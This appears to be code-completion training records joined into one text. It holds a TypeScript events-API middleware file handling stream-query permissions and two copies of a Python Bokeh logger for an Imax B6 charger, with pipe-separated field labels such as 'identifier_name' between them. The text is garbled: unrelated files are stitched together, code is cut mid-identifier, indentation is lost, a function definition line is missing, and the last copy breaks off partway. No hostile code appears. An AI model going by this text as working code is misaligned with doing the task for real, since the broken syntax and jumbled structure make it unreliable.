function coerceStreamsParam(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
if (params.streams == null) {
return next();
}
if (! context.acceptStreamsQueryNonStringified) {
if (isStringifiedJSON(params.streams)) {
try {
params.streams = parseStreamsParams(params.streams);
} catch (e) {
return next(e);
}
} else if (isStringOrArrayOfStrings(params.streams)) {
// good, do nothing
} else {
return next(errors.invalidRequestStructure('Invalid "streams" parameter. It should be an array of streamIds or JSON logical query.'))
}
} else {
if (isStringifiedJSON(params.streams)) {
try {
params.streams = parseStreamsParams(params.streams);
} catch (e) {
return next(e);
}
} else {
// good, do nothing
}
}
// Transform object or string to Array
if (!Array.isArray(params.streams)) {
params.streams = [params.streams];
}
next();
// Parse a stringified stream query; throws invalidRequestStructure on bad JSON.
function parseStreamsParams(input: string): ?StreamQuery | ?Array<StreamQuery> {
try {
return JSON.parse(input);
} catch (e) {
throw errors.invalidRequestStructure('Invalid "streams" parameter. It should be an array of streamIds or JSON logical query. Error while parsing JSON ' + e, input);
}
}
/**
* we detect if it's JSON by looking at first char.
* Note: since RFC 7159 JSON can also starts with ", true, false or number - this does not apply in this case.
* @param {string} input
*/
function isStringifiedJSON(input: any): boolean {
return (typeof input === 'string') && ['[', '{'].includes(input.substr(0, 1));
}
// True for a single string or an array containing only strings.
function isStringOrArrayOfStrings(input: any): boolean {
if (typeof input === 'string') return true;
if (! Array.isArray(input)) return false;
for (const item of input) {
if (typeof item !== 'string') return false;
}
return true;
}
}
async function applyDefaultsForRetrieval(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
_.defaults(params, {
streams: [{ any: ['*'] }],
tags: null,
types: null,
fromTime: null,
toTime: null,
sortAscending: false,
skip: null,
limit: null,
state: 'default',
modifiedSince: null,
includeDeletions: false
});
if (params.fromTime == null && params.toTime != null) {
params.fromTime = timestamp.add(params.toTime, -24 * 60 * 60);
}
if (params.fromTime != null && params.toTime == null) {
params.toTime = timestamp.now();
}
if (params.fromTime == null && params.toTime == null && params.limit == null) {
// limit to 20 items by default
params.limit = 20;
}
next();
}
function tra | ntext: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
try {
params.arrayOfStreamQueries = streamsQueryUtils.transformArrayOfStringsToStreamsQuery(params.streams);
} catch (e) {
return next(errors.invalidRequestStructure(e, params.streams));
}
next();
}
function validateStreamsQueriesAndSetStore(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
try {
streamsQueryUtils.validateStreamsQueriesAndSetStore(params.arrayOfStreamQueries);
params.arrayOfStreamQueriesWithStoreId = params.arrayOfStreamQueries;
} catch (e) {
return next(errors.invalidRequestStructure('Initial filtering: ' + e, params.streams));
}
next();
}
// Permission check and '*' replacement are joined in one pass because the
// streamIds substituted for '*' must themselves pass the permission check.
/**
 * For each stream query: if `any` contains '*', keep it when the access can
 * read the whole store, otherwise replace it with the streamIds the access
 * may read; for explicit `any` entries, verify each stream exists and is
 * readable. Fails with forbidden (first unauthorized id) or
 * unknownReferencedResource (unknown ids). `all`/`not` are not checked here
 * as they only narrow the scope.
 */
async function streamQueryCheckPermissionsAndReplaceStars(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
context.tracing.startSpan('streamQueries');
const unAuthorizedStreamIds: Array<string> = [];
const unAccessibleStreamIds: Array<string> = [];
// Collects offenders into the two arrays instead of failing fast, so the
// error can report after the whole walk.
async function streamExistsAndCanGetEventsOnStream(streamId: string, storeId: string,
unAuthorizedStreamIds: Array<string>, unAccessibleStreamIds: Array<string>): Promise<void> {
// remove eventual '#' in streamQuery
const cleanStreamId: string = streamId.startsWith('#') ? streamId.substr(1) : streamId;
const stream: Stream = await context.streamForStreamId(cleanStreamId, storeId);
if (stream == null) {
unAccessibleStreamIds.push(cleanStreamId);
return;
}
if (! await context.access.canGetEventsOnStream(cleanStreamId, storeId)) {
unAuthorizedStreamIds.push(cleanStreamId);
}
}
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
// ------------ "*" case
if (streamQuery.any && streamQuery.any.includes('*')) {
if (await context.access.canGetEventsOnStream('*', streamQuery.storeId)) continue; // We can keep star
// replace any by allowed streams for reading
const canReadStreamIds: Array<string> = [];
for (const streamPermission of context.access.getStoresPermissions(streamQuery.storeId)) {
if (await context.access.canGetEventsOnStream(streamPermission.streamId, streamQuery.storeId)) {
canReadStreamIds.push(streamPermission.streamId);
}
}
streamQuery.any = canReadStreamIds;
} else { // ------------ All other cases
/**
* ! we don't have to check for permissions on 'all' or 'not' as long there is at least one 'any' authorized.
*/
if (streamQuery?.any?.length === 0) {
return next(errors.invalidRequestStructure('streamQueries must have a valid {any: [...]} component'));
}
for (const streamId: string of streamQuery.any) {
await streamExistsAndCanGetEventsOnStream(streamId, streamQuery.storeId, unAuthorizedStreamIds, unAccessibleStreamIds);
};
}
}
if (unAuthorizedStreamIds.length > 0) {
context.tracing.finishSpan('streamQueries');
return next(errors.forbidden('stream [' + unAuthorizedStreamIds[0] + '] has not sufficent permission to get events'));
}
if (unAccessibleStreamIds.length > 0) {
context.tracing.finishSpan('streamQueries');
return next(errors.unknownReferencedResource(
'stream' + (unAccessibleStreamIds.length > 1 ? 's' : ''),
'streams',
unAccessibleStreamIds));
}
next();
}
/**
* Add "forced" and "none" events from permissions
*/
function streamQueryAddForcedAndForbiddenStreams(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
// ------------ ALL --------------- //
// add forced Streams if exists
const forcedStreamIds: Array<string> = context.access.getForcedStreamsGetEventsStreamIds(streamQuery.storeId);
if (forcedStreamIds?.length > 0) {
if (streamQuery.all == null) streamQuery.all = [];
// TODO check for duplicates
streamQuery.all.push(...forcedStreamIds);
}
// ------------- NOT ------------- //
const forbiddenStreamIds: Array<string> = context.access.getForbiddenGetEventsStreamIds(streamQuery.storeId);
if (forbiddenStreamIds?.length > 0) {
if (streamQuery.not == null) streamQuery.not = [];
// TODO check for duplicates
streamQuery.not.push(...forbiddenStreamIds);
}
}
next();
}
/**
 * Expand every streamId of each query into the id plus all of its children
 * ('#'-prefixed ids are returned as-is, unexpanded), via
 * streamsQueryUtils.expandAndTransformStreamQueries; queries left without
 * any inclusion ('any'/'and') are dropped afterwards.
 */
async function streamQueryExpandStreams(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
// Store-aware expansion callback: queries the mall for the stream subtree
// and strips the store prefix from the collected ids.
async function expandStreamInContext(streamId: string, storeId: string, excludedIds) {
// remove eventual '#' in streamQuery
if (streamId.startsWith('#')) {
return [streamId.substr(1)]; // do not expand Stream
}
const query: StoreQuery = {
id: streamId,
storeId: storeId,
includeTrashed: params.state === 'all' || params.state === 'trashed',
expandChildren: true,
excludedIds: excludedIds
};
const tree: Array<Stream> = await mall.streams.get(context.user.id, query);
// collect streamIds
const resultWithPrefix: Array<string> = treeUtils.collectPluck(tree, 'id');
// remove storePrefix
const result: Array<string> = resultWithPrefix.map((fullStreamId: string) => StreamsUtils.storeIdAndStreamIdForStreamId(fullStreamId)[1]);
return result;
}
try {
params.arrayOfStreamQueriesWithStoreId = await streamsQueryUtils.expandAndTransformStreamQueries(params.arrayOfStreamQueriesWithStoreId, expandStreamInContext);
} catch (e) {
// NOTE(review): console.log looks like a debug leftover; the error is
// already forwarded to next(e)
console.log(e);
context.tracing.finishSpan('streamQueries');
return next(e);
}
// delete streamQueries with no inclusions
params.arrayOfStreamQueriesWithStoreId = params.arrayOfStreamQueriesWithStoreId.filter(streamQuery => streamQuery.any != null || streamQuery.and != null);
context.tracing.finishSpan('streamQueries');
next();
}
/**
* - Create a copy of the params per query
* - Add specific stream queries to each of them
*/
async function findEventsFromStore(filesReadTokenSecret: string,
isStreamIdPrefixBackwardCompatibilityActive: boolean, isTagsBackwardCompatibilityActive: boolean,
context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
if (params.arrayOfStreamQueriesWithStoreId?.length === 0) {
result.events = [];
return next();
}
// in> params.fromTime = 2 params.streams = [{any: '*' storeId: 'local'}, {any: 'access-gasgsg', storeId: 'audit'}, {any: 'action-events.get', storeId: 'audit'}]
const paramsByStoreId: Map<string, GetEventsParams> = {};
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
const storeId: string = streamQuery.storeId;
if (storeId == null) {
console.error('Missing storeId' + params.arrayOfStreamQueriesWithStoreId);
throw(new Error("Missing storeId" + params.arrayOfStreamQueriesWithStoreId));
}
if (paramsByStoreId[storeId] == null) {
paramsByStoreId[storeId] = _.cloneDeep(params); // copy the parameters
paramsByStoreId[storeId].streams = []; // empty the stream query
}
delete streamQuery.storeId;
paramsByStoreId[storeId].streams.push(streamQuery);
}
// out> paramsByStoreId = { local: {fromTime: 2, streams: [{any: '*}]}, audit: {fromTime: 2, streams: [{any: 'access-gagsg'}, {any: 'action-events.get}]}
/**
* Will be called by "mall" for each source of event that need to be streames to result
* @param {Store} store
* @param {ReadableStream} eventsStream of "Events"
*/
function addnewEventStreamFromSource (store, eventsStream: ReadableStream) {
let stream: ReadableStream = eventsStream;
if (isStreamIdPrefixBackwardCompatibilityActive && !context.disableBackwardCompatibility) {
stream = eventsStream.pipe(new ChangeStreamIdPrefixStream());
}
if (isTagsBackwardCompatibilityActive) {
stream = stream.pipe(new addTagsStream());
}
stream = stream.pipe(new SetSingleStreamIdStream());
if (store.settings?.attachments?.setFileReadToken) {
stream = stream.pipe(new SetFileReadTokenStream({ access: context.access, filesReadTokenSecret }));
}
result.addToConcatArrayStream('events', stream);
}
await mall.events.generateStreams(context.user.id, paramsByStoreId, addnewEventStreamFromSource);
result.closeConcatArrayStream('events');
return next();
}
async function init() {
mall = await getMall();
}
module.exports = {
init,
applyDefaultsForRetrieval,
coerceStreamsParam,
validateStreamsQueriesAndSetStore,
transformArrayOfStringsToStreamsQuery,
streamQueryCheckPermissionsAndReplaceStars,
streamQueryAddForcedAndForbiddenStreams,
streamQueryExpandStreams,
findEventsFromStore,
} | nsformArrayOfStringsToStreamsQuery(co | identifier_name |
imax_logger.py | """
Bokeh interface for the Imax B6 mini charger
Requires: bokeh - pip install bokeh
but calls imax_0.py; see imax_0.py for additional necessary library packages
"""
import sys
import time
import datetime
from bokeh.models import ColumnDataSource, Slider, DataTable, TableColumn
from bokeh.plotting import Figure, output_file, show
from bokeh.plotting import figure, output_file, show
from bokeh.io import output_file, show
from bokeh.layouts import widgetbox, column, row
from bokeh.models.widgets import Button, RadioButtonGroup, Select, Slider, RadioGroup, Div, TextInput
from bokeh.layouts import gridplot, layout
from bokeh.plotting import curdoc
from bokeh.driving import linear
from bokeh.models.callbacks import CustomJS
# specify variables for the inputs.
bat_type = ""
chrg_type = ""
nominal_mah = 0
DC_or_CD = "Discharge/Charge"
cycles = 1
cells = 4
run_text = "Enter run information"
time_interval = 10  # seconds between periodic reads
final_read = {'final_mah': "", 'final_t': "", 'final_V': "", 'final_T': ""}
# next is set in start_device(), which is obtained from imax_0.start_imax
device_dict = {'device': None, 'EndPt_out': None, 'EndPt_in': None}
text_update = None
settings_dict = {}
read_data = {}
data_out_packet = []
device_started = False
out_data = {}
start_cycle = None
run_status = 0
# create a dictionary of initial values to minimize global calls
settings = {
    'bat_type': bat_type,
    'cells': cells,
    'chrg_type': chrg_type,
    'nominal_mah': nominal_mah,
    'DC_or_CD': DC_or_CD,
    'cycles': cycles,
    'device_started': device_started,
    'time_interval': time_interval,
    'start_cycle': start_cycle,
    'run_text': run_text,
    'run_status': run_status,
    # bug fix: the rest of the app reads/writes settings['final_read']
    # (get_final_data, button_save_handler); this entry was keyed
    # 'final_out', so saving before a completed run raised KeyError.
    'final_read': final_read,
    'data_out_packet': data_out_packet,
    'settings_dict': settings_dict,
    'device_dict': device_dict
}
#Create the header for page
notice1 = Div(text="""The data input here are for logging identification and saving conditions, which are already manually chosen
on the imax. They do not set or reset the imax.""",
sizing_mode = "scale_width")
# battery chemistry selector; value is stored for logging only
select_battype = Select(title = "Battery Type", value ="", options = ['NiMH', 'NiCd', 'LiPO', 'LiFe', 'LiIO', 'LiHV'])
def select_battype_handler(attr, old, new):
settings['bat_type'] = new
select_battype.on_change('value', select_battype_handler)
# charge program selector, mirrors the mode chosen manually on the imax
select_chrg_type = Select(title="Charge Type", value="Charge", options=["Charge", "Discharge", "Cycle", "Re-Peak", "AutoCharge", "Balance Charge", "Fast Charge", "Storage"])
def select_chrg_type_handler(attr, old, new):
settings['chrg_type'] = new
select_chrg_type.on_change('value', select_chrg_type_handler)
# rated capacity of the battery under test, in mah
maxmah_slider = Slider(start=50, end=24000, value=1, step=50, title="Bat. Specified Capacity, mah")
def maxmah_handler(attr, old, new):
settings['nominal_mah'] = new
maxmah_slider.on_change('value', maxmah_handler)
# cycle-order selector (discharge first vs charge first)
DC_radio_group = RadioGroup(labels=["Discharge/Charge", "Charge/Discharge"], active=0)

def DC_radio_handler(new):
    # bug fix: store the chosen label under 'DC_or_CD', the key the rest of
    # the app reads (see button_save_handler); the handler used to write an
    # unused 'DC' key holding the raw index.
    settings['DC_or_CD'] = DC_radio_group.labels[new]

DC_radio_group.on_click(DC_radio_handler)
# number of cells in the pack (1-12); logging only, not sent to the imax
select_cells = Select(title = "No. of Cells", value ="4", options = [str(i) for i in range(1,13)])
def select_cells_handler(attr, old, new):
settings['cells'] = new
select_cells.on_change('value', select_cells_handler)
#imax discharge/charge # of cycles; imax limit is 5
#no way to read this from imax only shows up in set up packet
select_cycles = Select(title = "Cycles", value ="1", options = [str(i) for i in range(1,6)])
def select_cycles_handler(attr, old, new):
settings['cycles'] = new
select_cycles.on_change('value', select_cycles_handler)
# free-form description saved with the run data
text_input = TextInput(value="Enter run information", title="Run Info::")
def text_input_handler(attr, old, new):
settings['run_text'] = new
text_input.on_change("value", text_input_handler)
# scrolling message log: text_update() streams (time, msg) rows into this
# source, which backs the on-page DataTable
textsource = ColumnDataSource(data=dict(time = [],msg = []))
columns = [
TableColumn(field="time", title="Time"),
TableColumn(field="msg", title="Msg", width = 600)]
data_table = DataTable(source=textsource, columns=columns, width=600)
button_save = Button(label="Save Run", button_type = 'warning')
# Collect the UI-entered run metadata plus the recorded data and hand them
# to imax_0.write_excel_file; the resulting filename is echoed to the log.
def button_save_handler():
global read_data
print('button save worked')
run_modes= {'bat_type':settings['bat_type'], 'chrg_type':settings['chrg_type'], 'nominal_mah':settings['nominal_mah'],
'DC_or_CD':settings['DC_or_CD'], 'cycles':settings['cycles'], 'cells':settings['cells'], 'run_text':settings['run_text']}
excel_out = imax_0.write_excel_file(run_modes, settings['final_read'], read_data, settings['settings_dict'])
msg = 'Data saved to: ' + excel_out
print(msg)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_save.on_click(button_save_handler)
def text_update(t, msg):
    """Append a timestamped message to the on-page scrolling log table.

    t: pre-formatted time string; msg: text to display.
    Keeps at most the last 20 rows (ColumnDataSource rollover).
    """
    # bug fix: the function name was garbled in the source; every caller
    # invokes text_update(t, msg), so that name is restored here.
    global data_table
    print('time and msg: ', t, msg)
    new_data = dict(time=[t], msg=[msg],)
    textsource.stream(new_data, 20)  # 20 = rollover; older rows scroll off
    data_table.update()
import imax_0
# Poll the imax for its current run status byte.
# Writes int(data[4]) into settings['run_status'] and returns it; returns
# None when the device handle is missing (disconnected).
# NOTE(review): status semantics appear to be <=1 running / >1 idle (see the
# wait loops in start_device) -- confirm against imax_0.
def check_device_status():
global device_dict
#used by startstop btn handler to determine if imax start btn was pressed, or imax running.
#global device_dict
EndPt_out = device_dict['EndPt_out']
EndPt_in = device_dict['EndPt_in']
device = device_dict['device']
#send host->imax packet to trigger imax to do imax->host transfer
#make sure device is still connected
if device:
w_out = device.write(EndPt_out, settings['data_out_packet'])
data = device.read(EndPt_in.bEndpointAddress,EndPt_in.wMaxPacketSize)
settings['run_status'] = int(str(data[4]))
return settings['run_status']
else:
print('Check device failed.')
return None
def get_final_data():
    """Request the end-of-run summary packet from the imax and record it.

    Parses capacity (mah), elapsed time (s), voltage (V) and external
    temperature into settings['final_read'], then logs a one-line summary
    to the on-page table. Does nothing if the read returns no data.
    """
    global device_dict
    device = device_dict['device']
    EndPt_out = device_dict['EndPt_out']
    EndPt_in = device_dict['EndPt_in']
    # host->imax request packet for the final (0xfe) report
    final_out = [0x0f, 0x03, 0xfe, 0x000, 0xfe, 0xff, 0xff] + [0]*57
    w_out = device.write(EndPt_out, final_out)
    final_data = device.read(EndPt_in.bEndpointAddress, EndPt_in.wMaxPacketSize)
    if final_data:
        final_mah = str(final_data[5] * 256 + final_data[6])  # energy, mah
        final_t = str(final_data[7] * 256 + final_data[8])  # timer, sec
        final_V = str((final_data[9] * 256 + final_data[10]) / 1000.0)  # voltage, V (raw value is mV)
        final_T = str(final_data[14])  # temperature, deg C -- TODO confirm unit/scale
        settings['final_read'] = {'final_mah': final_mah, 'final_t': final_t, 'final_V': final_V, 'final_T': final_T}
        # bug fix: final_V is in volts (divided by 1000 above) but the
        # message used to label it 'mV'
        msg = 'Run completed. Final values: ' + final_mah + ' mah; ' + final_V + ' V; ' + final_t + ' s.'
        print(msg)
        text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
def start_device():
    """Find the imax on USB, initialise it and wait for a run to start.

    Waits up to one minute for the device to appear on USB, then up to one
    more minute for the user to press the imax start button (run_status <= 1).
    Returns True when the device is connected and running, False on timeout.
    Side effects: fills the globals device_dict / read_data and the settings
    entries 'settings_dict', 'data_out_packet' and 'run_status'.
    """
    global read_data
    global device_dict
    # check for device; if absent, poll for up to one minute
    device_str = imax_0.find_my_device()  # message contains "No" when not found
    if "No" in device_str:
        text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), device_str)
        print(device_str)
        text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax offline. Cycling for one minute.')
        futuretime = datetime.datetime.now() + datetime.timedelta(minutes = 1)
        while "No" in device_str:
            device_str = imax_0.find_my_device()
            if "No" in device_str:
                if datetime.datetime.now() > futuretime:
                    text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Could not find device; check device and connection.')
                    return False
                time.sleep(1)
    print('device found')
    text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), device_str)
    # device was found: engage it, get parameters and dictionaries
    device_dict, read_data, settings_dict, data_out_packet = imax_0.start_imax()
    print('Loading settings')  # bug fix: this string literal was unterminated (SyntaxError)
    settings['settings_dict'] = settings_dict
    settings['data_out_packet'] = data_out_packet
    # determine if the device is idling (run_status 2 or 3) or running (1)
    settings['run_status'] = check_device_status()
    futuretime = datetime.datetime.now() + datetime.timedelta(minutes = 1)
    text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Waiting for Imax button press for one minute.')
    while settings['run_status'] > 1:
        settings['run_status'] = check_device_status()
        if datetime.datetime.now() > futuretime:
            text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax button not pressed in 1 min...aborting start.')
            return False
        time.sleep(1)
    print('out of loop run_status is: ', settings['run_status'])
    return True
def add_lines(plot, source, cells_num = 0):
    """Add one per-cell voltage line ('cell1'..'cellN') to `plot`.

    Called from the start/stop handler for lithium battery types; does
    nothing unless cells_num > 1. Line colors cycle when there are more
    cells than colors (the UI allows up to 12 cells).
    """
    color_list = ['orange', 'yellow', 'green', 'blue', 'violet', 'darkmagenta']
    if cells_num > 1:
        for i in range(cells_num):
            # bug fix: draw on the `plot` argument (the original referenced
            # the global p1, ignoring the parameter) and wrap the color
            # index so more than 6 cells cannot raise IndexError
            plot.line(x = 'timer', y = 'cell' + str(i + 1), source = source,
                      color = color_list[i % len(color_list)], line_width = 2)
button_startstop = Button(label = "Start", button_type = 'success')
# Start/stop state machine driven by the button label itself:
# "Start" -> connect to the imax and begin the periodic update() callback;
# "Stop"  -> cancel the callback and fetch the final run summary.
def button_startstop_handler():
global button_startstop
#the button label doubles as the state driver for this handler
#label = "Start": and device_started = False is initial start up condition
if button_startstop.label == "Start":
button_startstop.label = "Connecting"
settings['device_started'] = start_device()
#returns True if device found,connected and started
if settings['device_started']:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax found & running.')
button_startstop.label = "Stop"
# poll the imax every 10 s; `update` is defined elsewhere in the app
settings['start_cycle'] = curdoc().add_periodic_callback(update, 10000)
print('device found')
else:
if not settings['device_started']:
button_startstop.label = "Start"
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax start failed. Check everything')
else: #deal with stop conditions; user pressed app stop button, or run_status > 1 (imax buttons pressed.)
if button_startstop.label == "Stop":
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Run stopped.')
curdoc().remove_periodic_callback(settings['start_cycle'])
get_final_data()
button_startstop.label = "Start"
# NOTE(review): p1 and source are defined outside this excerpt; original
# indentation was lost, so the intended branch of this add_lines call
# should be confirmed against the source file
if "Li" in settings['bat_type']:
add_lines(p1, source, cells_num = int(settings['cells']))
button_startstop.on_click(button_startstop_handler)
def read_imax():
global read_data
global device_dict
# see above call to start_imax() for globals set from imax.py
#global data_out_packet
global out_data
#global run_status
device = device_dict['device']
EndPt_out = device_dict['EndPt_out']
EndPt_in = device_dict['EndPt_in']
#send the host->imax packet to trigger imax to fill buffer and do imax->host transfer
#make sure device is still connected
w_out = device.write(EndPt_out, settings['data_out_packet'])
try:
data = device.read(EndPt_in.bEndpointAddress,EndPt_in.wMaxPacketSize) #using more general form of Endpoint_IN attributes
except Exception as e:
print('Something went wrong: no data incoming; error is: ', e)
sys.exit()
#Parse the hex data
out_data['mah'] = [int(str(data[5]*256 + data[6]))] #capacity, mah
out_data['timer'] = [int(str(data[7]*256 + data[8]))] #seconds
out_data['volts'] = [int(str(data[9]*256 + data[10]))] #volts
out_data['current'] = [int(str(data[11]*256 + data[12]))] #amps
out_data['ext_T'] = [int(str(data[13]))]
out_data['internal_T'] = [int(str(data[14]))] #deg. C?
out_data['cell1'] = [int(str(data[17]*256 + data[18]))] #cell 1 etc.
out_data['cell2'] = [int(str(data[19]*256 + data[20]))]
out_data['cell3'] = [int(str(data[21]*256 + data[22]))]
out_data['cell4'] = [int(str(data[23]*256 + data[24]))]
out_data['cell5'] = [int(str(data[25]*256 + data[26]))]
out_data['cell6'] = [int(str(data[27]*256 + data[28]))]
read_data['mah'].append(int(str(data[5]*256 + data[6]))) #capacity, mah
read_data['timer'].append(int(str(data[7]*256 + data[8]))) #seconds
read_data['volts'].append(int(str(data[9]*256 + data[10]))) #volts
read_data['current'].append(int(str(data[11]*256 + data[12]))) #amps
read_data['ext_T'].append(int(str(data[13])))
read_data['internal_T'].append(int(str(data[14]))) #deg. C?
read_data['cell1'].append(int(str(data[17]*256 + data[18])))
read_data['cell2'].append(int(str(data[19]*256 + data[20])))
read_data['cell3'].append(int(str(data[21]*256 + data[22])))
read_data['cell4'].append(int(str(data[23]*256 + data[24])))
read_data['cell5'].append(int(str(data[25]*256 + data[26])))
read_data['cell6'].append(int(str(data[27]*256 + data[28])))
#print the data (same sequence Milek7 used with hidapi; much appreciated effort.
print(
str(data[4]) + ", " + #state
str(data[5] * 256 + data[6]) + ", " + #energy
str(data[7] * 256 + data[8]) + ", " + #timer
str((data[9] * 256 + data[10]) / 1000.0) + ", " + #voltage
str((data[11] * 256 + data[12]) / 1000.0) + ", " + #current
str(data[13]) + ", " + #ext temp
str(data[14]) + ", " + #int temp
str((data[17] * 256 + data[18]) / 1000.0) + ", " + #cell 1
str((data[19] * 256 + data[20]) / 1000.0) + ", " + #cels 2
str((data[21] * 256 + data[22]) / 1000.0) + ", " + #cell 3
str((data[23] * 256 + data[24]) / 1000.0) + ", " + #cell 4
str((data[25] * 256 + data[26]) / 1000.0) + ", " + #cell 5
str((data[27] * 256 + data[28]) / 1000.0) #cell 6
)
#Has the charger been stopped by pressing the charger Stop button?
settings['run_status'] = int(str(data[4]))
return settings['run_status'], out_data
#initialize read_data dictionary for plots
out_data = {'mah':[0], 'timer':[0], 'volts':[0], 'current':[0],
'ext_T':[0], 'internal_T':[0], 'cell1':[0], 'cell2':[0],
'cell3':[0],'cell4':[0], 'cell5':[0], 'cell6':[0]}
#time_interval = 5 #seconds
source = ColumnDataSource(data = out_data)
#Generate two plots, for capacity and voltage
p = figure(plot_width=400, plot_height=400)
p.title.text = "Capactiy Input vs. Charge Time"
p.title.text_color = "black"
p.title.text_font = "arial"
p.title.text_font_style = "bold"
p.yaxis.minor_tick_line_color = "black"
p.xaxis.axis_label = "Time, s"
p.yaxis.axis_label = "Capacity Added(mah)"
r_cap = p.line(x = 'timer', y = 'mah', source = source, color="red", line_width=2)
#Set the voltabe plot; complicated a bit by battery type
p1 = figure(plot_width=400, plot_height=400)
p1.title.text = "Voltage vs. Charge Time"
p1.title.text_color = "black"
p1.title.text_font = "arial"
p1.title.text_font_style = "bold"
p1.yaxis.minor_tick_line_color = "black"
p1.xaxis.axis_label = "Time, s"
p1.yaxis.axis_label = "Voltage. mV"
rx = p1.line(x = 'timer', y = 'volts', source = source, color = "firebrick", line_width=2)
"""
#test block for adding lines
if "Li" in bat_type:
r1 = p1.line(x ='timer', y = 'cell1', source = source, color="orange", line_width=2)
r2 = p1.line(x ='timer', y = 'cell2', source = source, color="yellow", line_width=2)
r3 = p1.line(x ='timer', y = 'cell3', source = source, color="green", line_width=2)
r4 = p1.line(x ='timer', y = 'cell4', source = source, color="blue", line_width=2)
r5 = p1.line(x ='timer', y = 'cell5', source = source, color="violet", line_width=2)
r6 = p1.line(x ='timer', y = 'cell6', source = source, color="darkmagenta", line_width=2)
"""
def update():
global out_data
global source
global device_dict
device = device_dict['device']
if device:
#note "new_data" is bokeh specific to only add to source
settings['run_status'], new_data = read_imax()
#print('read_imax returned run status: ', settings['run_status'])
if settings['run_status'] < 2 and button_startstop.label == "Stop":
source.stream(new_data) # 20)
else:
msg = '; User stopped run from imax stop button.'
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_startstop_handler()
else:
msg = '; Device no longer connected.'
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_startstop_handler()
"""
class Cycler(update()):
msg = "Message from Cycler"
start_cycle = staticmethod(curdoc().add_periodic_callback(update, 10000))
stop_cycle = staticmethod(curdoc().remove_periodic_callback(start_cycle))
# create the widgets
"""
#start_cycle = curdoc().add_periodic_callback(update, 10000) #time in milliseconds
#w1 = row(select_battype, select_chrg_type) #, width = 300) #sizing_mode = 'fixed')
w1 = widgetbox(select_battype, select_chrg_type, select_cells) #, width = 300) #sizing_mode = 'fixed')
w2 = widgetbox(maxmah_slider) #, sizing_mode='fixed')
w3 = widgetbox(text_input) #, sizing_mode = 'fixed')
w4 = widgetbox(button_startstop, button_save )#, sizing_mode ='fixed')
w5 = widgetbox(DC_radio_group, select_cycles)
w6 = widgetbox(data_table)
"""
Layit = layout([row(column(
[notice1],
[w1],
[w2],
[w3],
[w4],
[w5],
[data_table]),
column(p, p1))], sizing_mode='fixed')
"""
#Layit = gridplot([[column([p, p1]), widgetbox(w1.children+w2.children+w3.children+w4.children+w5.children)]])
curdoc().add_root(notice1)
Layit = gridplot([[widgetbox(w1.children+w2.children+w3.children+w4.children+w5.children,), column([p, p1])]])
curdoc().add_root(Layit)
curdoc().add_root(data_table)
#curdoc().add_root(p)
#curdoc().add_root(p1)
#interval is not constant,
#based on derivative of capacity
# Add a periodic callback to be run every 500 milliseconds
#curdoc().add_periodic_callback(update, 500)
#for running textarea update following is one way to do it with js
"""
textare udating w/ jquery and textarea
var txt = document.getElementById('log');
setInterval(function(){txt.value += '\ntest';},2000);
<textarea id='log' rows=50 cols=60 autofocus></textarea>
""" | text_update | identifier_name |
imax_logger.py | """
Bokah interface for Imax B6 mini charnger
Requires: bokeh - pip install bokuh
but calls imax_0.py; see imax_0.py for additional necessary library packages
"""
import sys
import time
import datetime
from bokeh.models import ColumnDataSource, Slider, DataTable, TableColumn
from bokeh.plotting import Figure, output_file, show
from bokeh.plotting import figure, output_file, show
from bokeh.io import output_file, show
from bokeh.layouts import widgetbox, column, row
from bokeh.models.widgets import Button, RadioButtonGroup, Select, Slider, RadioGroup, Div, TextInput
from bokeh.layouts import gridplot, layout
from bokeh.plotting import curdoc
from bokeh.driving import linear
from bokeh.models.callbacks import CustomJS
#specify varibles for the inputs.
bat_type = ""
chrg_type = ""
nominal_mah = 0
DC_or_CD = "Discharge/Charge"
cycles = 1
cells = 4
run_text = "Enter run information"
time_interval = 10 #seconds
final_read = {'final_mah':"", 'final_t':"", 'final_V':"", 'final_T':""}
#next is set in start_device(), which is obtained from imax_0.start_imax
device_dict = {'device':None, 'EndPt_out':None, 'EndPt_in':None}
text_update = None
settings_dict = {}
read_data = {}
data_out_packet = []
device_started = False
out_data = {}
start_cycle = None
run_status = 0
#create a dictionary of initial values to minimize global calls
settings = {
'bat_type':bat_type,
'cells':cells,
'chrg_type':chrg_type,
'nominal_mah':nominal_mah,
'DC_or_CD':DC_or_CD,
'cycles':cycles,
'device_started':device_started,
'time_interval':time_interval,
'start_cycle':start_cycle,
'run_text':run_text,
'run_status':run_status,
'final_out':final_read,
'data_out_packet':data_out_packet,
'settings_dict':settings_dict,
'device_dict':device_dict
}
#Create the header for page
notice1 = Div(text="""The data input here are for logging identification and saving conditions, which are already manually chosen
on the imax. They do not set or reset the imax.""",
sizing_mode = "scale_width")
select_battype = Select(title = "Battery Type", value ="", options = ['NiMH', 'NiCd', 'LiPO', 'LiFe', 'LiIO', 'LiHV'])
def select_battype_handler(attr, old, new):
settings['bat_type'] = new
